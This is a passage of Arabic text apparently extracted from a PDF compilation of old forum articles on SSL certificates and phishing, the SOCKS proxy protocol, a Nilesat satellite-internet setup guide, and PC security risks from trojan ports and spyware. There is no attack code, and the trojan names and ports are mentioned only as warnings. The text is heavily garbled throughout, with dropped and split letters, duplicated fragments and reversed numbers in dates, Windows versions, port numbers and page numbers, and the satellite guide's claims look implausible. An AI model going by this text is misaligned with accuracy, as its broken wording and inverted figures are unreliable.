‫ث‬ ‫ھ ل رأيتم كیف تكون النترنت خبیثه و ذكیه ‪ .‬و ھ ناك الكثیر مما يمكن‬ ‫الموضوع‪ ‬‬ ‫ع‬ ‫عنه و عن انواع مثل ھ ذه الختراقات و لكننا سنتركه الن و لنركز فى‬ ‫الصلى‪ .‬‬ ‫‪.‬‬ ‫ى‪ ‬‬ ‫و دور ال ‪ SSL‬ھنا ھى انھا تحاول تخطى ھذه المشكله او تحاول الوصول الى‬ ‫‪ digital‬‬ ‫‪d‬‬ ‫السرفر الحقیقى المطلوب عن طريق تخزين ال ‪ DNS‬داخل ال‬ ‫‪ certificate‬و بذلك فیقوم بالتعرف علیه بوضوح تام و بشكل صحیح‪.‬فعندما يتصل‬ ‫ل‬ ‫يوزر بموقع يستخدم ال ‪ SSL‬فیقدم السرفر الشھاده بأن ھذا العنوان موجود فى‬ ‫ى‬ ‫ه‪ ‬‬ ‫ال ‪ DNS‬الفلنى فیقارن المتصفح العنوان للموقع الذى تريده بما تحتويه‬ ‫الشھاده او ال ‪ certificate.‬و لذلك فسیكون الیوزر متأكدمن صحه الموقع و‪ ‬‬ ‫ال‪ ‬‬ ‫السرفر المتصل بھ م و اذا بالموقع فیه اى عطل فسیخبر الیوزر عن طريق ل‬ ‫‪POP­UP WINDOW‬و سیكون الیوزر متأكد من ان ھذا السرفر فعل لديه شھاده‬ ‫ه‬ ‫صحیحه‪ .‬‬ ‫‪.‬‬ ‫فى‪ ‬‬ ‫و الن تخیل معنا ثانیا لو انه حصل نوع من المھاجمه مثل الذى دكرناه ى‬ ‫البنك‪ .‬‬ ‫‪.‬‬ ‫العلى و ھو ان يكوم ھ اكر بتصمیم نسخه طبق الصل من موقع‬ ‫‪ SSL‬‬ ‫‪S‬‬ ‫للمعرفه طبعا ان الھاكر ل يعرف اى طريقه لسھله لیخدع بھا ال‬ ‫ك‪ ‬‬ ‫‪ authentication mechanism‬اى میكانزم توثیق او ثقه ال ‪ SSL‬و لذلك يترك‬ ‫الھاكر ال ‪ SSL‬جانبا دون ان يضعھ ا فى التصمیم لموقعه المطابق للبنك و و‪ ‬‬ ‫لذلك فأن موقع الھاكر ل يكون لديه شھاده من ال ‪ digital certificate‬لیكون ھو‪ ‬‬


‫ه‪ ‬‬ ‫الموقع الذى يطلبه الیوزر لن موقع البنك الصلى طبعا يستخدم ال ‪ SSL‬و لديه‬ ‫ستراه‪ ‬‬ ‫ه‬ ‫شھاده ثقه على انه ھ و فعل موقع البنك ‪.‬و يمكن الفارق الوحید الذى‬ ‫من‪ ‬‬ ‫بین الموقعین ھ ى اليقونه الصغیره التى تكلمنا عنھا فى الجزء الول ن‬ ‫ك‪ ‬‬ ‫الموضوع و ھى التى توضح ان ھ ذا الموقع محمى بواسطه ال ‪ SSL‬و لذلك‬ ‫فعلى‪ ‬‬ ‫ى‬ ‫فیكون التفريق بین موقع الھاكر و الموقع الصلى سھل جداا‪ .‬و بذلك‬ ‫المزيف‪ .‬‬ ‫‪.‬‬ ‫الیوزر ان يمتنع عن استعمال معلوماته الشخصیه فى الموقع‬ ‫د‪ ‬‬ ‫للتوضیح اكثر ‪ ,‬ان ال ‪ SSL technology‬تقدم توثیق او ثقه مؤثره جداا و لكن بعد‬ ‫اقتناع‪ ‬‬ ‫ع‬ ‫كل ھذا فنجد انه ھناك عدد غیر كاف من الیوزرس ھم فقط المقتنعین‬ ‫تام بأھمیه وجود ال ‪ SSL‬فى المواقع و لذلك يجب علینا التطوير فى انفسنا و‪ ‬‬ ‫‪ 581‬‬ ‫تام‪ .‬‬ ‫‪.‬‬ ‫يجب علینا النتباه لمثل ھ ذه الشیاء الصغیره حتى نكون فى أمان‬ ‫اتمنى ان يكون الجزء الثانى من الموضوع نال اعجابكم ھذا الجزء الذى وضحناا‬ ‫فیه قیمه ال ‪ SSL‬و قیمه التوثیق التى تعطیه للسرفر لكى يتأكد الیوزر انه فى‬ ‫ى‬ ‫اكرز‪ ‬‬ ‫أمان تام من امثل الھ ز‬ ‫‪ 681‬‬ ‫‪ Socks‬‬ ‫‪S‬‬ ‫ما ھو بروتوكول‬ ‫ل‬ ‫‪ Smart C0d3r‬‬ ‫‪S‬‬ ‫للكاتب‪:‬‬ ‫‪ SOCKS‬‬ ‫‪S‬‬ ‫الیوم سوف أقوم بشرح فكرة بروتوكول السوكس‬ ‫س‬ ‫نقله‪ ‬‬ ‫وآلیة العمل طبعا ھ ذا الدرس رأيته في إحدى الكتب النجلیزية فأحببته ه‬ ‫نا‪ ‬‬ ‫مترجما ھ ا‬ ‫ة‪ ‬‬ ‫وفي ھ ذا الدرس راح نعرض شرح لبروتوكول ‪ Socks‬واستخدام و تطبیق أنظمة‬ ‫‪ Proxy gateway‬‬ ‫‪P‬‬ ‫مدخل البروكسي‬ ‫ي‬ ‫نبدأ‪ ...‬‬ ‫‪.‬‬ ‫بسم االله‬ ‫­­­­­‪ ‬‬ ‫ما ھو ‪ SOCKS‬؟‪ ‬‬ ‫­­­­­‪ ‬‬ ‫ة‪ ‬‬ ‫‪Socks‬ھو بروتوكول بروكسي عام لسس ‪ TCP/IP‬للستخدامات الشبكیة‬ ‫‪ Networking‬‬ ‫تشمل‪ ‬‬ ‫ل‬ ‫وبروتوكول السوكس مزود بنطاق سھل لعداد اتصالت آمنة وسھلة‬ ‫أخرى‪ ‬‬ ‫ى‬ ‫تقنیات تكنلوجیة أمنیة‬ ‫­­­­­‪ ‬‬ ‫كیف يعمل ‪ SOCKS‬؟‪ ‬‬ ‫­­­­­‪ ‬‬ ‫‪A‬‬ ‫‪Application‬‬ ‫عندما يحتاج تطبیق (برنامج (مستخدم ما التصال مع تطبیق خادم‬ ‫‪ Server‬‬ ‫‪ Socks Proxy Server‬‬ ‫‪S‬‬ ‫فإن جھ از المستخدم يقوم بالتصال بواسطة‬ ‫ة‬ ‫والبیانات‪ ‬‬ ‫ت‬ ‫طبعا بروكسي الخادم يتصل بتطبیق الخادم بالنیابة عن (المستخدم‬ ‫الخادم)‪ ‬‬ ‫)‬ ‫المتبادلة بین المستخدم وتطبیق‬ ‫المستخدم‪ ‬‬ ‫م‬ ‫وأيضا نعلم أن لتطبیق الخادم بروكسي خادم ھو‬ ‫­­­­­‪ ‬‬ ‫‪ SOCKS‬‬ ‫‪S‬‬ ‫ل‬ ‫بروتوكول‬ ‫­­­­­‪ ‬‬ ‫ت‪ ‬‬ ‫الصدارة الخامس لـ ‪ SOCKS‬اعتمدته ‪ IETF‬أي اللجنة الخاصة لنظام النترنت‬ ‫‪ (RFC‬‬ ‫(‬ ‫واعتبرته كمبدأ بروتوكول تنفیذي تطبیقي(‪8291‬‬ ‫‪ 781‬‬ ‫س‪ ‬‬ ‫يتضمن ‪ SOCKS‬كائنین ھما خادم السوكس و مستخدم السوكس‬ ‫تطبیق‪ ‬‬ ‫ق‬ ‫خادم السوكس قد ُبق (نفذ) على طبقة‬ ‫ط‪ ‬‬ ‫ط‬ ‫الغرض‪ ‬‬ ‫ض‬ ‫بینما مستخدم السوكس قد ُبق بین التطبیق وطبقات الرسال‬ ‫ط‪ ‬‬ ‫ط‬


‫الساسي من ھذا البروتوكول ھو السماح للمضیفین ‪ hosts‬من جانب واحد‬ ‫د‬ ‫السوكس‪ ‬‬ ‫س‬ ‫على خادم‬ ‫‪ Socks‬‬ ‫‪S‬‬ ‫من الحصول على تصريح للدخول للجانب الخر من خادم السوكس‬ ‫‪ Server‬‬ ‫‪ “IP­reachability‬‬ ‫‪I‬‬ ‫بدون أمر أو طلب مباشر”‬ ‫­­­­­‪ ‬‬ ‫‪ OSI‬‬ ‫ة ‪O‬‬ ‫صورة توضیخیة لـ ‪ Socks‬ونموذج طبقة‬ ‫­­­­­‪ ‬‬ ‫آخر‪ ‬‬ ‫الموضوع له تكملة ان شا االله في موضوع ر‬ ‫بالعربي‪ ‬‬ ‫ي‬ ‫وطبعا صعب أني أشرح مصطلحات انجلیزية‬ ‫وم‪ ‬‬ ‫وبالنسبة لي أنا فاھم الموضوع أما إن كان الموضوع غیر مفھ م‬ ‫نا‪ ‬‬ ‫بإمكانك تنزيل الكتاب النجلیزي عن الموضوع ھذا من ھ ا‬ ‫‪ http://m­arab.org/uploads/697857aa9a.zip‬‬ ‫­­­­­­‪ ‬‬ ‫‪ Socks‬‬ ‫‪S‬‬ ‫ف‬ ‫وضائف‬ ‫­­­­­­‪ ‬‬ ‫يقوم بروتوكول ‪ Socks‬بأربعة وضائف ھي كالتي‪ ::-‬‬ ‫‪ connection requests‬‬ ‫‪c‬‬ ‫*تحديد وإعداد طلبات التصال‬ ‫ل‬ ‫‪ proxy circuits‬‬ ‫‪p‬‬ ‫*تھ یئة وإعداد بروكسي غیر مباشر أو ما يسمى بــ‬ ‫‪ application data‬‬ ‫‪a‬‬ ‫*متابعة بیانات التطبیق‬ ‫ق‬ ‫(اختیاري)‪ ‬‬ ‫)‬ ‫*التحقق من أداء المستخدم‬ ‫‪ 881‬‬ ‫­­­­­­‪ ‬‬ ‫‪ Socks‬‬ ‫‪S‬‬ ‫ممیزات وخواص‬ ‫ص‬ ‫­­­­­­‪ ‬‬ ‫المتعددة‪ ‬‬ ‫ة‬ ‫الوصول المصرح به للشبكة بوضوح عبر أجھ زة و خوادم البروكسي‬ ‫‪ Proxy servers‬‬ ‫والتشفیر‪ ‬‬ ‫ر‬ ‫النتشار السھل لطرق التحقق‬ ‫الجديدة‪ ‬‬ ‫ة‬ ‫النتشار السريع لتطبیقات الشبكة‬ ‫‪ Simple Network‬‬ ‫‪S‬‬ ‫سیاسة الدارة وأمن الشبكة البسیطة‬ ‫ة‬ ‫­­­­­­‪ ‬‬ ‫‪ Socks‬‬ ‫‪S‬‬ ‫د‬ ‫فوائد‬ ‫­­­­­­‪ ‬‬ ‫‪c‬‬ ‫‪communication‬‬ ‫نظام إتصال منفرد يوثق المستخدمین ويؤسس قناة إتصال‬ ‫‪ channel‬‬ ‫ل‪ ‬‬ ‫‪Socks‬ھو تطبیق برنامج مستقل‬ ‫يمكن استخدامه إما مع ‪ UDP‬أو ‪ TCP‬مستندا على بروتوكولت تدعم توجیھا‬ ‫‪ ICMP‬‬ ‫‪I‬‬ ‫زوجیا للــ‬ ‫ع‪ ‬‬ ‫دعم ثنائي اتجاھي و ‪ NAT‬حقیقي أساسي لضافة المان وقتل الخداع‬ ‫‪ security and anti­spoofing‬‬ ‫‪s‬‬ ‫ش‬ ‫والغش‬ ‫­­­­­­‪ ‬‬ ‫الخلصة‪ ‬‬ ‫ة‬ ‫­­­­­­‪ ‬‬ ‫ة‪ ‬‬ ‫‪ Socks‬مرتكز على اللجنة الخاصة لنظام النترنت ‪ IETF‬ومعايیر صناعیة‬ ‫ة‪ ‬‬ ‫ٍ ‪Socks‬سھل للنتشار والدارة‬ ‫ن‪ ‬‬ ‫‪Socks‬واضح للمستخدم بینما ھو مزود بطبقات متعددة وآمن‬ ‫‪ Socks‬‬ ‫‪S‬‬ ‫إلى ھنا أنھي موضوعي عن بروتوكول‬ ‫ل‬ ‫المجال‪ ‬‬ ‫ل‬ ‫وأتمنى أن أكون قد أفدتكم ولو بشيء قلیل في ھذا‬ ‫‪ 981‬‬ ‫‪ 201‬‬ ‫‪2‬‬ ‫توصیل النترنت بنايل سات‬


‫من‪ ‬‬ ‫ينطلق ھذا الیوم ‪ 81/8/0002‬القمر الصناعي المصري نايل سات ‪ 201‬ن‬ ‫‪ 08‬‬ ‫فرنسا وھ و أمل عظیم كنا ننتظره منذ قديم الزمن ويضم ھذا القمر أكثر من ‪0‬‬ ‫خاصة‪ ‬‬ ‫ة‬ ‫قناة خاصة بنقل المعلومات عبر النترنت ‪ ،‬ويحتوي القمر على قناة‬ ‫ما‪ ‬‬ ‫للبورصة العالمیة والسواق المالیة ‪ ،‬وقناة أخرى خاصة بالتسوق ‪ ،،،،‬لكن ا‬ ‫ريسفر‪ ‬‬ ‫ر‬ ‫يھمنا ھنا ھ و النترنت ‪ .‬يجب أن يكون لديك التجھیزات التالیة ‪ :‬جھاز‬ ‫‪C‬‬ ‫‪COM‬‬ ‫رقمي يحمل فتحتي ‪ PCMCI‬على القل ‪ ،‬ويحتوي على فتحة من الخلف‬ ‫ط‪ ‬‬ ‫‪ PORT‬طبق قطره متر على القل يوجد علیه رأس موجه ب ‪ 7‬درجات غرب خط‬ ‫‪ PCMCI ETHERNET‬‬ ‫‪P‬‬ ‫الستواء ‪ ،،،،‬كیبل ‪ SMART CABL‬أو ‪ CABL LINK‬بطاقة‬ ‫‪ AOL‬‬ ‫‪A‬‬ ‫‪ 001/01‬جھاز كمبیوتر ‪ .‬متصفح اكسبلورر ‪ .‬اشتراك في ‪ MSN‬أو‬ ‫ن‪ ‬‬ ‫أول ‪ :‬برمج الرأس على الطبق على ‪ 7‬درجات غرب خط الستواء ‪ .‬إذا لم يكن‬ ‫لديك خبره في ذلك اتصل بالمھندس الذي ركب لك الدش ‪ ..‬‬ ‫ب‪ ‬‬ ‫ثانیا ‪ :‬ابحث عن قناة ‪ : INTERNET DATA‬إذا لم تجدھا يجب علیك أن تكتب‬ ‫ت‪ ‬‬ ‫التردد الخاص بھ ا ‪ ،‬إذا كنت في السعودية فالتردد ھو ‪ 2021-2001 :‬وإذا كنت‬ ‫القناة‪ ‬‬ ‫ة‬ ‫في دولة أخرى فأكتب اسم دولتك في الردود وسأرسل لك مباشرة تردد‬ ‫في دولتك التي أنت فیھا ‪ ..‬‬ ‫بالبحث‪ ‬‬ ‫ث‬ ‫ملحظة ‪( :‬أنصح جمیع المستخدمین بكتابة التردد يدويا وعدم القتناع‬ ‫التوماتیكي لسباب سأطرحھا لحقا ))‪ ‬‬ ‫أحصل‪ ‬‬ ‫ل‬ ‫ثالثا ‪ :‬يجب أن يكون في جھاز الريسفر لديك فتحة لمسار كرت ‪PCMCI‬‬ ‫‪ ETHERNET CARD‬‬ ‫‪E‬‬ ‫على كرت ‪ PCMCI‬ويفضل أن يكون من ‪ 3COM‬مودم أو‬ ‫‪ 11RG‬‬ ‫‪1‬‬ ‫كلھ ما ينفع لكن يجب أن يكون في الكرت فتحة ‪.‬‬ ‫ي‪ ‬‬ ‫رابعا ‪ :‬أدخل ھ ذه البطاقة بفتحة الريسفر السريعة ( ايردتو ) ملحظة ھي‬ ‫‪ (ART AND SHOWTAIME‬‬ ‫(‬ ‫نفس الفتحة التي تعمل علیھا كروت‪( .‬‬ ‫خامسا ‪ :‬شغل قناة النترنت بالتردد الذي ذكرته تماما ‪ ..‬‬ ‫ك‪ ‬‬ ‫سادسا ‪ :‬أحضر وصلة ھاتف لھا رأسین ‪11 RG‬اشبك الول بالمودم في جھازك‬ ‫‪ PCMCI‬‬ ‫‪P‬‬ ‫‪ ،‬واشبك الرأس الثاني في الكرت ‪.‬‬ ‫‪ SEREAL‬‬ ‫‪S‬‬ ‫ملحظة مھمة ‪ :‬يجب أن تكون الفارة في جھازك ‪2 PS‬ولیست ‪.‬‬ ‫سابعا ‪ :‬يوجد لديك فتحة ‪ SEREAL‬في الجھاز ‪ ،‬اذھب إلى خصائص المذربوردد‪ ‬‬ ‫ل‪ ‬‬ ‫واجعل تلك الفتحة تحمل ‪ 1 ، COM‬وانقل المودم إلى منفذ آخر إذا كان يحمل‬ ‫نفس المنفذ ‪ ..‬‬ ‫ه‪ ‬‬ ‫ثامنا ‪ :‬أحضر ‪ LINK CABL‬واربطه بجھاز الكمبیوتر ( وھو مطفأ ) واجعل رأسه‬ ‫‪ 091‬‬ ‫الثاني في فتحة ‪ COM‬الموجودة خلف الريسفر ‪ .‬‬ ‫ملحظة مھ مة قبل التشغیل ‪ :‬يجب أن يكون الويندوز لديك ھو ويندوز ان تي أوو‬ ‫ويندوز ‪ 89‬الصدار الثاني ‪ ،‬ويجب أن يكون لديك اكسبلورر ‪ . 5‬‬ ‫ولكن تأكدوا من المور التالیة ‪ ::‬‬ ‫نسخة ويندوز ‪ 89‬الصدار الثاني ‪ .‬‬‫‪ ( FULL INSTALL‬‬ ‫(‬ ‫تحمیل اكسبلورر ‪ 5‬مع كافة أدواته ‪( .‬‬‫‪ MSN OR AOL‬‬ ‫‪M‬‬ ‫اشتراك في‪.‬‬‫والحلقة‪ ‬‬ ‫ة‬ ‫سیكون ھ ذا الجزء على حلقتین ‪ :‬الحلقة الولى تجھیز الكمبیوتر ‪،‬‬ ‫الثانیة تجھیز الريسفر ‪ ..‬‬ ‫الحلقة الولى ‪ :‬تجھیز الكمبیوتر ‪ ::‬‬ ‫ثم‪ ‬‬ ‫أول إضغط على زر ( جوار شبكة التصال بالزر اليمن ) ثم اختر خصائص م‬ ‫م‪ ‬‬ ‫اذھب الى بروتوكول ‪ TCP/IP‬الملحق بكرت الشبكة لديك واختر خصائص ثم‬ ‫ول‪ ‬‬ ‫تأكد من المور التالیة ‪ :‬عنوان الجھاز في الوضع تلقائي ( ‪ ( DISABLE‬ل‬ ‫يحمل أي رقم ‪ ....‬في خانة عبارة ) أضف العبارات التالیة ‪ (( :‬‬ ‫‪ ) 001.861.861.291‬و‪ ‬‬ ‫ق‪ ‬‬ ‫‪ .. 1.001.861.291‬ثم اضغط موافق‬ ‫ت‪ ‬‬ ‫اذا كان لديك الصدار الثاني من ويندوز ‪ 89‬فاحذف بروتوكول مشاركة النترنت‬ ‫إزالة‪ ‬‬ ‫ة‬ ‫إذا كان موجودا ضع علیه مؤشر الفارة ثم اختر‬ ‫‪A‬‬ ‫‪ATM LAN‬‬ ‫اختر بعد ذلك إضافة < بروتوكول < مايكروسوفت < عمیل ومضاھاة‬


‫سیطلب منك بعد ذلك قرص ويندوز أدخل القرص ثم أعد التشغیل ‪ ..‬‬ ‫بعد إعادة التشغیل إفتح اكسبلورر ‪ 5‬واختر أدوات < خیارات انترنت < عام <‪ ‬‬ ‫إعدادات < أبدا < موافق ‪ ..‬‬ ‫ثم اذھب إلى صفحة البداية واجعلھا ‪ http://www.msn.com / :‬لحظ وجود ‪ :‬‬ ‫( ‪(HTTP‬ثم تطبیق ثم موافق ‪ .‬‬ ‫وانتظر‪ ‬‬ ‫ر‬ ‫اتصل الن بالنترنت عن طريق اشتراكك العادي عن طريق خط المودم‬ ‫ة‪ ‬‬ ‫حتى يفتح صفحة ‪ MSN‬كاملة بجمیع عناصرھا ‪ .‬وتاكد أنھا الصفحة الحديثة‬ ‫بالضغط على مفتاح ‪ 5 F ....‬اقطع التصال بالنترنت واترك الصفحة مفتوحة ‪ .‬‬ ‫اذھب إلى إدارة الجھ زة في لوحة التحكم وتأكد أن كرت الشبكة ‪ 01/001‬ل‪ ‬‬ ‫يتعارض مع أيه أجھ زة أخرى ‪ .‬يجب أن تكون الفارة لديك على مخرج ‪ 2 PS‬س‬ ‫ولیس‬ ‫‪ . SEREAL‬‬ ‫‪ LINK CABEL‬‬ ‫‪L‬‬ ‫أحضر كیبل ‪ UTB‬واشبكه بكرت الشبكة بالكمبیوتر ‪ ،‬وأحضر‬ ‫واشبك رأسه الول في مخرج ‪ SEREAL‬الموجود في الجھاز لديك ‪ .‬‬ ‫اذھ ب إلى اكسبلورر مرة أخرى واختر أدوات < خیارات انترنت < اتصالت < أزل‬ ‫ل‬ ‫‪ 191‬‬ ‫‪ LAN‬‬ ‫‪L‬‬ ‫الملقم الوكیل < إعدادات ‪ LAN‬ثم اختر التصال عن طريق شبكة < (‬ ‫تطبیق < موافق < موافق ‪ ..‬‬ ‫لقد انتھ یت الن من إعداد الكمبیوتر بقي إعداد الريسفر ‪ ..‬‬ ‫الحلقة الثانیة ‪ :‬إعداد الريسفر ‪ ::‬‬ ‫تتأكد‪ ‬‬ ‫د‬ ‫أول يا شباب ھناك بعض الجھزة ل تعمل بھذه الخاصیة ‪ ،‬لذلك يجب أن‬ ‫على‪ ‬‬ ‫من التاجر الذي اشتريت منه ھ ذا الدش ‪ ،‬لكنني أقول لكم أنني جربته ى‬ ‫جھاز نوكیا ‪ 0089‬فعمل بكل طلقة وسلسة ‪ ،‬وكذلك على جھاز تكنوسات ‪ .‬‬ ‫أول ‪ :‬يفترض أن تكون قد برمجت القناة وفق ما ذكرنا في الجزاء السابقة ‪ ،،‬‬ ‫وھي جاھزة لديك الن ‪ ،،‬ألیس كذلك ‪ ..‬‬ ‫احضر كرت شبكة ‪ PCMCI‬وأدخله في فتحة أريدتو الموجوده في الجھاز واشبك‬ ‫ك‬ ‫بھا كیبل ‪ UTB‬القادم من جھاز الكمبیوتر ‪ .‬‬ ‫ر‪ ‬‬ ‫اشبك الرأس الثاني من كیبل ‪ LINK‬في القتحة الموجودة في جھاز الريسفر‬ ‫من الخلف ‪ ..‬‬ ‫عدا‪ ‬‬ ‫يجب أن يكون الكمبیوتر مستمرا في التشغیل لكن أطفيء جمیع البرامج ا‬ ‫ف‪ ‬‬ ‫صفحة ‪ MSN‬التي سبق فتحھا وتأكد أن برنامج الفیروسات وشاشة التوقف‬ ‫معطل‪ ‬‬ ‫ل‬ ‫بوضع‬ ‫‪ INTERNET DATA‬‬ ‫‪I‬‬ ‫الن شغل الريسفر واذھب إلى قناة‬ ‫انتظر لمدة عشر دقائق تقريبا سیظھ ر لك برنامج التشغیل اتبع الخطوات التالیة‬ ‫ة‬ ‫‪ :‬‬ ‫‪ OK‬‬ ‫اختر ‪ INBUT‬واختر ‪ OK‬ثم ‪O .‬‬ ‫‪ OK‬‬ ‫إذھب إلى ‪ UOTBUT‬واختر من القائمة ‪ PCMCI‬ثم ‪O‬‬ ‫ط‪ ‬‬ ‫اختر ‪ SEARCH‬وانتظر حتى ترى ‪ MSN‬أو ‪ MICROSOFT NETWORK‬ثم اضغط‬ ‫‪ OK‬‬ ‫علیھا ثم اختر ‪ OK‬ثم اختر ‪ ALL‬ثم ‪O‬‬ ‫انتظر بعدھ ا لمدة دقیقتین تقريبا ثم اذھ ب إلى الكمبیوتر واضغط أي رابطة على‬ ‫ى‬ ‫الصفحة وستجد أن النترنت تعمل لديك على أفضل ما يرام بدون ھاتف ‪ ..‬‬ ‫ملحظة ‪ ( :‬ستصلك النترنت بدون صوت إذا أردت وصول الصوت على الكمبیوتر‬ ‫ر‬ ‫محلت‪ ‬‬ ‫ت‬ ‫فتحتاج توصیلة من الريسفر إلى كرت الصوت بالجھاز وھي تباع لدى‬ ‫الصوتیات وأجھزة المساجد على شرط أن يكون كرت الصوت لديك ‪ 821‬بت) ‪ .‬‬ ‫البرنامج‪ ‬‬ ‫ج‬ ‫إذا كان الريسفر لديك ل يوجد به برنامج اتصال بالنترنت فیمكنك انزال‬ ‫الجديد حسب نوع جھازك من الموقع التالي ‪ ::‬‬ ‫‪ http://quassi.virtualave.net/ipdvb2000.html‬‬ ‫‪ 291‬‬ ‫المخاطر المنیة على شبكة الویب والوقایة منها(‪193 )1‬‬ ‫الظامي‪ ‬‬ ‫ي‬ ‫للكاتب‪ :‬حزم‬ ‫ندخل كل یوم إلى هذه الشبكه العنكبوتیه التي سخرها االله لنا فإما أن نقدر هذه النعمه ونؤتیها‪ ‬‬


‫حقه‬ ‫وسنخرها في مرضاة االله والدعوة الیه وخدمة دینه وإل أصبحت نقمة ووبا ً علینا ‪ .‬‬ ‫ل‪ ‬‬ ‫(((( وعن عمره فیما أفناه ))))‪ ‬‬ ‫=======================‪ ‬‬ ‫=======================‪ ‬‬ ‫عموما ندخل لموضوعنا وهو أننا حین ندخل إلى هذه الشبكة فیجب أن نكون على درایة بما نحن‪ ‬‬ ‫ه فهو عرضه للختراق والعتداء علیه من قبل‬ ‫مقدمون علیه ‪ ،‬فإن المستخدم إذا لم یكون حذًر ومتنب ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫الهكرز والقراصنه عبر المنافذ التي یتسللون منها ‪ .‬‬ ‫والمنفذ أو الـ (‪ (PORT‬هنا سوفت ویر حیث أننا على شبكة الویب بعیدین كل البعد عن منافذ‪ ‬‬ ‫الهاردویر‪ .‬‬ ‫ومن باب الفائدة نتعرف على تعریف البورت من ناحیة الحاسب اللي ‪ :‬‬ ‫فهو المنفذ أو الطرف أو المخرج وهذا المصطلح یرمز إلى القناة أو المدخل الطبیعي في‪ ‬‬ ‫الحاسب‬ ‫والذي یسمح للحاسب بالتصال بالجهزة الخرى ‪ .‬‬ ‫ب سیكون المنفذ ‪1 COM‬أو ‪2. COM‬‬ ‫مثال ‪ :‬لدینا فاكس مودم خارجي ‪ . U.S ROBOTICS‬فغال ً‬ ‫ا‪ ‬‬ ‫وهذا منفذا محسوس ما علینا منه خووووووف ‪ .‬یعني هذا ما یتعلق بموضوع الهكرز الذي سنتطرق‪ ‬‬ ‫إلیه إنما ذكرته من باب الفائدة ‪ .‬‬ ‫أما إذا أردنا أن نعرف المنفذ الذي نقصده في اصطلح شبكة النترنت فیقصد به العنوان الذي‪ ‬‬ ‫ترسل‬ ‫علیه دفعات حزم البیانات ( ‪ . (PACKETS‬‬ ‫وهذه المنافذ هي التي یتسلل منها القراصنه الى اجهزة مرتادي الشبكه ‪ .‬إذا ما وجدوا ثغرة تسمح‪ ‬‬ ‫لهم‬ ‫بذلك ‪ .‬‬ ‫مثال ‪ :‬برنامج ‪ NETBUS‬ویتسلل به الهاكر الى جهاز ضحایاه عن طریق المنفذ ‪ 54321 :‬أو‪ ‬‬ ‫‪ 64321 .‬‬ ‫ج بین الشباب العرب وغالب الحادیث في المنتدیات منصبه‬ ‫أو برنامج السب سفن الذي لقي روا ً‬ ‫على‬ ‫ا‪ ‬‬ ‫هذا البرنامج الذي صنعه الهاكر موب مان ‪ .‬‬ ‫ومنافذه كثیره ابرزها ‪ 1176 :‬أو ‪ 3421‬أو ‪ 9991‬وأشهر منافذه ‪ . 47372‬‬ ‫والبرامج كثیرة ‪ .‬والمنافذ أكثر ‪ .‬‬ ‫‪ 491‬‬ ‫سنحاول في المواضیع القادمة إلقاء الضوء قدر المستطاع على هذه النقاط ‪ .‬‬ ‫حتى یكون المستخدم لهذه الشبكه على درایة بالبحر الذي یخوض فیه ‪ .‬‬ ‫ولحظ في الصورة الثانیه كشف لك بورت ‪ ) 931 ( .‬‬ ‫یا اخون احذروا من هذا البورت لنه لئیم ویسمى بورت النت بیوس ‪ .‬‬ ‫والختراق عن طریق هذا البورت یتم في اكثر الحوال على الشبكات ‪ .‬‬ ‫اي اشكالت راجعوا هذه الصفحه ‪ .‬‬ ‫‪ http://www.7azm.8m.net/port.htm‬‬ ‫وهذا یعني أنك معرض للختراق في أي وقت وبأي طریقة كانت وقد یستهدفك أحد المخترقین (‪ ‬‬ ‫ب عن طریق عمل ‪ SCAN‬على أیبیات مزودي الخدمه‬ ‫ی كما یحصل غال ً‬ ‫الهاكرز ) لسبب ما أو عشوائ ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫‪ .‬‬ ‫وربما یكون هذا الهكرز خبیًر (‪ (expert‬فیمكنه اختراقك بحیث ل تشعر بما یفعله في نظامك وفي‪ ‬‬ ‫ا‪ ‬‬ ‫ملفاتك وخصوصیاتك ‪ .‬‬ ‫لذلك أفضل طریقه هي عدم وضع أشیائك الهامة والخاصة داخل جهازك كرقم بطاقة الئتمان أو‪ ‬‬


‫أرقامك السریة ‪ ....‬الخ ‪ ..‬‬ ‫وقد یرسل الهاكرز السیرفر والى ضحیته فإذا ما تم تشغیل سیرفر البرنامج مكن الهاكرز مخالبه‪ ‬‬ ‫ن‬ ‫من‬ ‫فریسته ‪ ..‬‬ ‫=======================‪ ‬‬ ‫=======================‪ ‬‬ ‫نقطه مهمة وعابره بعد ان تحدثنا عن النقاط السابقه ‪ ::‬‬ ‫الفایروسات‪ ‬‬ ‫ت‬ ‫كذلك یجب أن تتخذ أسالیب الحمایة الممكنة مثل برامج الحمایه من‬ ‫‪ ( NORTON ANTI VIRUS‬‬ ‫(‬ ‫مثل برنامج النورتن انتي فایروس (‬ ‫وهو البرنامج الكثر شعبیه عند العرب مع أنه ل یروق لي كثیًر ‪ ..‬‬ ‫اا‪ ‬‬ ‫كذلك من برامج الحمایة من الفایروسات ( ‪ ) Trend PC­cillin 0002‬وأحب أن أنوه أن هذاا‪ ‬‬ ‫البرنامج ممتاز جد ً وانصح الشباب باستخدامه ‪ ..‬‬ ‫اا‪ ‬‬ ‫والحرص على تحدیثه دوریً ‪ ..‬‬ ‫اا‪ ‬‬ ‫وكذلك الفایرولت مثل الفایروال اللماني (‪ ( eSafe‬وهو جید إلى حد ما ‪ .‬‬ ‫أو (‪ ( McAfee Firewall‬استخدمته وهو ممیز جدا ً‪ ‬‬ ‫والجدران الناریة مثل (‪ ( ZoneAlarm‬وغیرها من البرامج الخرى التي سنتطرق لها بتوسع إن شاءء‬ ‫االله في مواضیع قادمه بإذن االله ‪ ..‬‬ ‫‪ 591‬‬ ‫المخاطر المنیة على شبكة الویب والوقایة منها(‪ )2‬‬ ‫الظامي‪ ‬‬ ‫ي‬ ‫للكاتب‪ :‬حزم‬ ‫ا‬ ‫ع‬ ‫تبا‬ ‫ذكل‬ ‫نكمل‬ ‫عنها‬ ‫الكشف‬ ‫كیفیة‬ ‫وعن‬ ‫المنافذ‬ ‫وعن‬ ‫إكما ً لما سبق أن ذكرناه عن بعض المخاطر‬ ‫ً‬ ‫ل‬ ‫بهذا الموضوع ‪ ..‬‬ ‫بالنترنت‪ ‬‬ ‫ت‬ ‫ملحظة هامة قبل البدأ بعملیة فحص جهازك أنه ینصح أن لتكون متص ً‬ ‫ل‪ ‬‬ ‫ل‬ ‫‪ XHack‬‬ ‫‪X‬‬ ‫إسم البرنامج ‪:‬‬ ‫ممیزات عامة للبرنامج ‪ ::‬‬ ‫اسم‪ ‬‬ ‫امكانیة كشف جمیع انواع ملفات التجسس وباي شكل كان وباي امتداد وباي م‬ ‫جهازك‪ ‬‬ ‫ك‬ ‫امكانیة كشف البرنامج الذي یحاول الهكر 